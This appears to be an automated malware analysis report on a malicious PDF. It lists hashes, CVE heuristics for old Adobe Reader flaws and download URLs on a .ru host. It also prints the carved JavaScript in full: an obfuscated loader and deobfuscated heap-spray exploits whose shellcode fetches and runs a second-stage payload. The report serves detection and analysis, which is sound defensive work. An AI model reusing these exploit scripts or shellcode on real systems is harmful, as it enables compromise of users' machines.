Malicious PDF — malware analysis report

Static analysis result for SHA-256 76ea7b143fb99d51…

MALICIOUS

PDF

292.3 KB
MD5: 4051b488b22078bfee232fd0ae94d5a3 SHA-1: ae152f9cadc8080d7b414856dc033829829f65fe SHA-256: 76ea7b143fb99d5165627c88cd9dce825afb415b03bfa0205be918c8f7eb1351
578 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains embedded JavaScript that exploits multiple known Adobe Reader vulnerabilities, including CVE-2009-0927, CVE-2007-5659, and CVE-2008-2992. The deobfuscated JavaScript functions like `util_printf` and `collab_email` are designed to download and execute a second-stage payload from the provided URLs. This indicates a clear intent to compromise the user's system through exploit execution.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 13

  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • ASCIIHexDecode filter (with exploit indicators) medium PDF_FILTER_HEX
    Hex-encoding filter present alongside exploit delivery indicators — often used to hide payload or shellcode bytes
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ipdnsco.ru/tbGPV1hMHXeKt4PuNETRPiggvSxhnEzH?p&x=i900&&s=printf& Referenced by PDF JavaScript
    • http://ipdnsco.ru/tbGPV1hMHXeKt4PuNETRPiggvSxhnEzH?p&x=i900&&s=email&Referenced by PDF JavaScript
    • http://ipdnsco.ru/tbGPV1hMHXeKt4PuNETRPiggvSxhnEzH?p&x=i900&&s=gicon&Referenced by PDF JavaScript
    • http://ipdnsco.ru/tbGPV1hMHXeKt4PuNETRPiggvSxhnEzH?p&x=i900&&s=newp&Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0008_000.js
7bb8c87d8e72c434280ff15e011ebf25bd0cf6ffcd9d97975fed649910d1ffb3		 pdf-javascript-stream PDF /JS object 8 at offset 0x1CE 99528 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var xxxxxxxxxxxxxxxxxxxxx = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
var sss=event;
var ddd=this;
var fff=/TTZZ/ig;
var sfc=String.fromCharCode;
 function FRhJOtyljg1(BEqqXRVHic6) {
     var lTgnkbeLhM2 = "";
     var KyoSbejQHT31, KyoSbejQHT32, KyoSbejQHT33 = "";
     var UMkCWyvUkf41, UMkCWyvUkf42, UMkCWyvUkf43, UMkCWyvUkf44 = "";
     var i = 0;
     var BWyhJiJour5 = /[^A-Za-z0-9\+\/\=]/g;
     if (BWyhJiJour5["ex"+"ec"](BEqqXRVHic6)) {}
     BEqqXRVHic6 = BEqqXRVHic6.replace(/[^A-Za-z0-9\+\/\=]/g, "");
     do {
        UMkCWyvUkf41 = xxxxxxxxxxxxxxxxxxxxx["ind"+"exOf"](BEqqXRVHic6.charAt(i++));
        UMkCWyvUkf42 = xxxxxxxxxxxxxxxxxxxxx["ind"+"exOf"](BEqqXRVHic6.charAt(i++));
        UMkCWyvUkf43 = xxxxxxxxxxxxxxxxxxxxx["ind"+"exOf"](BEqqXRVHic6.charAt(i++));
        UMkCWyvUkf44 = xxxxxxxxxxxxxxxxxxxxx["ind"+"exOf"](BEqqXRVHic6.charAt(i++));
        KyoSbejQHT31 = (UMkCWyvUkf41 << 2) | (UMkCWyvUkf42 >> 4);
        KyoSbejQHT32 = ((UMkCWyvUkf42 & 15) << 4) | (UMkCWyvUkf43 >> 2);
        KyoSbejQHT33 = ((UMkCWyvUkf43 & 3) << 6) | UMkCWyvUkf44;
        lTgnkbeLhM2 = lTgnkbeLhM2 + sfc(KyoSbejQHT31);
        if (UMkCWyvUkf43 != 63+1) {
           lTgnkbeLhM2 = lTgnkbeLhM2 + sfc(KyoSbejQHT32);
        }
        if (UMkCWyvUkf44 != 63+1) {
           lTgnkbeLhM2 = lTgnkbeLhM2 + sfc(KyoSbejQHT33);
        }
        KyoSbejQHT31 = KyoSbejQHT32 = KyoSbejQHT33 = "";
        UMkCWyvUkf41 = UMkCWyvUkf42 = UMkCWyvUkf43 = UMkCWyvUkf44 = "";
     } while (i < BEqqXRVHic6.length);
     return lTgnkbeLhM2;
  }


var ggg="itPa";
var cadka = sss[FRhJOtyljg1("d*&*&*G*&*&*F*&*&*y*&*&*Z*&*&*2*&*&*V*&*&*0*&*&*")];
cadka[FRhJOtyljg1("e*&*&*m*&*&*9*&*&*v*&*&*b*&*&*V*&*&*R*&*&*5*&*&*c*&*&*G*&*&*U*&*&*=*&*&*")] = "F"+ggg+"ge";
var zgggzz = FRhJOtyljg1("Q*&*&*2*&*&*1*&*&*a*&*&*M*&*&*W*&*&*J*&*&*t*&*&*T*&*&*j*&*&*B*&*&*h*&*&*V*&*&*1*&*&*R*&*&*U*&*&*W*&*&*l*&*&*o*&*&*5*&*&*d*&*&*U*&*&*l*&*&*H*&*&*W*&*&*n*&*&*B*&*&*l*&*&*R*&*&*j*&*&*l*&*&*w*&*&*V*&*&*F*&*&*R*&*&*a*&*&*W*&*&*m*&*&*R*&*&*D*&*&*a*&*&*D*&*&*V*&*&*Z*&*&*W*&*&*E*&*&*p*&*&*6*&*&*Y*&*&*0*&*&*N*&*&*U*&*&*V*&*&*F*&*&*p*&*&*a*&*&*d*&*&*2*&*&*d*&*&*i*&*&*R*&*&*1*&*&*Z*&*&*1*&*&*S*&*&*1*&*&*N*&*&*C*&*&*N*&*&*1*&*&*R*&*&*U*&*&*W*&*&*l*&*&*p*&*&*D*&*&*b*&*&*m*&*&*R*&*&*v*&*&*Y*&*&*V*&*&*d*&*&*4*&*&*b*&*&*E*&*&*l*&*&*D*&*&*V*&*&*F*&*&*R*&*&*a*&*&*W*&*&*m*&*&*g*&*&*1*&*&*W*&*&*V*&*&*h*&*&*K*&*&*e*&*&*m*&*&*N*&*&*D*&*&*N*&*&*X*&*&*N*&*&*U*&*&*V*&*&*F*&*&*p*&*&*a*&*&*W*&*&*l*&*&*c*&*&*1*&*&*b*&*&*m*&*&*R*&*&*H*&*&*Z*&*&*2*&*&*d*&*&*L*&*&*a*&*&*V*&*&*R*&*&*U*&*&*W*&*&*l*&*&*p*&*&*B*&*&*e*&*&*U*&*&*l*&*&*E*&*&*d*&*&*2*&*&*d*&*&*i*&*&*R*&*&*1*&*&*Z*&*&*1*&*&*V*&*&*F*&*&*R*&*&*a*&*&*W*&*&*k*&*&*t*&*&*T*&*&*Q*&*&*j*&*&*d*&*&*l*&*&*V*&*&*0*&*&*Z*&*&*5*&*&*Y*&*&*z*&*&*N*&*&*U*&*&*V*&*&*F*&*&*p*&*&*a*&*&*Q*&*&*W*&*&*d*&*&*L*&*&*e*&*&*j*&*&*B*&*&*n*&*&*Z*&*&*V*&*&*d*&*&*G*&*&*e*&*&*V*&*&*R*&*&*U*&*&*W*&*&*l*&*&*p*&*&*j*&*&*M*&*&*0*&*&*E*&*&*3*&*&*Z*&*&*l*&*&*F*&*&*w*&*&*N*&*&*V*&*&*l*&*&*Y*&*&*V*&*&*F*&*&*R*&*&*a*&*&*W*&*&*k*&*&*p*&*&*6*&*&*Y*&*&*0*&*&*N*&*&*B*&*&*O*&*&*U*&*&*l*&*&*I*&*&*b*&*&*G*&*&*h*&*&*U*&*&*V*&*&*F*&*&*p*&*&*a*&*&*Y*&*&*2*&*&*5*&*&*O*&*&*d*&*&*0*&*&*x*&*&*u*&*&*T*&*&*j*&*&*F*&*&*Z*&*&*b*&*&*l*&*&*R*&*&*U*&*&*W*&*&*l*&*&*p*&*&*O*&*&*M*&*&*G*&*&*N*&*&*t*&*&*b*&*&*H*&*&*V*&*&*a*&*&*e*&*&*W*&*&*d*&*&*3*&*&*V*&*&*F*&*&*R*&*&*a*&*&*W*&*&*k*&*&*x*&*&*D*&*&*Q*&*&*n*&*&*N*&*&*a*&*&*V*&*&*z*&*&*R*&*&*n*&*&*T*&*&*H*&*&*l*&*&*U*&*&*V*&*&*F*&*&*p*&*&*a*&*&*Q*&*&*X*&*&*l*&*&*L*&*&*V*&*&*H*&*&*R*&*&*5*&*&*W*&*&*l*&*&*h*&*&*S*&*&*M*&*&*V*&*&*R*&*&*U*&*&*W*&*&*l*&*&*p*&*&*j*&*&*b*&*&*T*&*&*R*&*&*n*&*&*Z*&*&*V*&*&*d*&*&*G*&*&*e*&*&*W*&*&*M*&*&*z*&*&*V*&*&*F*&*&*R*&*&*a*&*&*W*&*&*k*&*&*E*&*&*3*&*&*Z*&*&*l*&*&*F*&*&*v*&*&*S*&*&*1*&*&*p*&*&*u*&*&*V*&*&*n*&*&*V*&*&*U*&*&*V*&*&*F*&*&*p*&*&*a*&*&*W*&*&*T*&*&*N*&*&*S*&*&*c*&*&*G*&*&*I*&*&*y*&*&*N*&*&*G*&*&*d*&*&*k*&*&*W*&*&*F*&*&*R*&*&*U*&*&*W*&*&*l*&*&*p*&*&*S*&*&*c*&*&*G*&*&*J*&*&*G*&*&*O*&*&*X*&*&*d*&*&*j*&*&*b*&*&*W*&*&*x*&*&*1*&*&*V*&*&*F*&*&*R*&*&*a*&*&*W*&*&*m*&*&*R*&*&*H*&*&*W*&*&*W*&*&*9*&*&*L*&*&*U*&*&*0*&*&*I*&*&*3*&*&*
... (truncated)
generic_stage_recovery_000.js
b3d76b68d2ab6f2e51350a38f5ef8b81d26205d01a8e40d9d5353cb06b4ca207		 deobfuscated-js generic stage recovery base64-literal-then-strip-TTZZ from JavaScript object 8 at offset 0x1CE 6512 bytes
Detection
ClamAV: Js.Exploit.Shellcode-18
Obfuscation or payload: likely
Carved artifact contains 11 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function fix_it(yarsp, len) {
while (yarsp.length * 2 < len) {yarsp += yarsp;}
yarsp = yarsp.substring(0, len / 2);return yarsp;}

function util_printf() {
var payload = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u692F%u6470%u736E%u6F63%u722E%u2F75%u6274%u5047%u3156%u4D68%u5848%u4B65%u3474%u7550%u454E%u5254%u6950%u6767%u5376%u6878%u456E%u487A%u703F%u7826%u693D%u3039%u2630%u7326%u703D%u6972%u746E%u2666%u9000");
var nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
var heapblock = nop + payload;
var bigblock = unescape("%u0A0A%u0A0A");
var headersize = 20;
var spray = headersize + heapblock.length;
while (bigblock.length < spray) {bigblock += bigblock;}
var fillblock = bigblock.substring(0, spray);
var block = bigblock.substring(0, bigblock.length - spray);
while (block.length + spray < 262144) {block = block + block + fillblock;}
var mem_array = new Array;
for (var i = 0; i < 1400; i++) {mem_array[i] = block + heapblock;}
var num = 1.3e+295;
util.printf("%45000f", num);
}

function collab_email() {
var shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u692F%u6470%u736E%u6F63%u722E%u2F75%u6274%u5047%u3156%u4D68%u5848%u4B65%u3474%u7550%u454E%u5254%u6950%u6767%u5376%u6878%u456E%u487A%u703F%u7826%u693D%u3039%u2630%u7326%u653D%u616D%u6C69%u0026%u9000");
var mem_array = new Array;
var cc = 202116108;
var addr = 4194304;
var sc_len = shellcode.length * 2;
var len = addr - (sc_len + 56);
var yarsp = unescape("%u9090%u9090");
yarsp = fix_it(yarsp, len);
var count2 = (cc - 4194304) / addr;
for (var count = 0; count < count2; count++) {mem_array[count] = yarsp + shellcode;}
var overflow = unescape("%u0c0c%u0c0c");
while (overflow.length < 44952) {overflow += overflow;}
this.collabStore = Collab.collectEmailInfo({subj: "", msg: overflow});
}


function collab_geticon() {
if (app.doc.Collab.getIcon) {
var arry = new Array;
var vvpethya = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u692F%u6470%u736E%u6F63%u722E%u2F75%u6274%u5047%u3156%u4D68%u5848%u4B65%u3474%u7550%u454E%u5254%u6950%u6767%u5376%u6878%u456E%u487A%u703F%u7826%u693D%u3039%u2630%u7326%u673D%u6369%u6E6F%u0026%u9000");
var hWq500CN = vvpethya
... (truncated)
generic_stage_recovery_001.js
345feaf156380627896a98753d671f864fbecbe41889222a94796e76a2e35e29		 deobfuscated-js generic stage recovery percent-decode from JavaScript object 8 at offset 0x1CE 6508 bytes
Detection
ClamAV: Js.Exploit.Shellcode-18
Obfuscation or payload: likely
Carved artifact contains 11 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function fix_it(yarsp, len) {
while (yarsp.length * 2 < len) {yarsp += yarsp;}
yarsp = yarsp.substring(0, len / 2);return yarsp;}

function util_printf() {
var payload = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u692F%u6470%u736E%u6F63%u722E%u2F75%u6274%u5047%u3156%u4D68%u5848%u4B65%u3474%u7550%u454E%u5254%u6950%u6767%u5376%u6878%u456E%u487A%u703F%u7826%u693D%u3039%u2630%u7326%u703D%u6972%u746E%u2666%u9000");
var nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
var heapblock = nop + payload;
var bigblock = unescape("%u0A0A%u0A0A");
var headersize = 20;
var spray = headersize + heapblock.length;
while (bigblock.length < spray) {bigblock += bigblock;}
var fillblock = bigblock.substring(0, spray);
var block = bigblock.substring(0, bigblock.length - spray);
while (block.length + spray < 262144) {block = block + block + fillblock;}
var mem_array = new Array;
for (var i = 0; i < 1400; i++) {mem_array[i] = block + heapblock;}
var num = 1.3e+295;
util.printf("E000f", num);
}

function collab_email() {
var shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u692F%u6470%u736E%u6F63%u722E%u2F75%u6274%u5047%u3156%u4D68%u5848%u4B65%u3474%u7550%u454E%u5254%u6950%u6767%u5376%u6878%u456E%u487A%u703F%u7826%u693D%u3039%u2630%u7326%u653D%u616D%u6C69%u0026%u9000");
var mem_array = new Array;
var cc = 202116108;
var addr = 4194304;
var sc_len = shellcode.length * 2;
var len = addr - (sc_len + 56);
var yarsp = unescape("%u9090%u9090");
yarsp = fix_it(yarsp, len);
var count2 = (cc - 4194304) / addr;
for (var count = 0; count < count2; count++) {mem_array[count] = yarsp + shellcode;}
var overflow = unescape("%u0c0c%u0c0c");
while (overflow.length < 44952) {overflow += overflow;}
this.collabStore = Collab.collectEmailInfo({subj: "", msg: overflow});
}


function collab_geticon() {
if (app.doc.Collab.getIcon) {
var arry = new Array;
var vvpethya = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u692F%u6470%u736E%u6F63%u722E%u2F75%u6274%u5047%u3156%u4D68%u5848%u4B65%u3474%u7550%u454E%u5254%u6950%u6767%u5376%u6878%u456E%u487A%u703F%u7826%u693D%u3039%u2630%u7326%u673D%u6369%u6E6F%u0026%u9000");
var hWq500CN = vvpethya.l
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.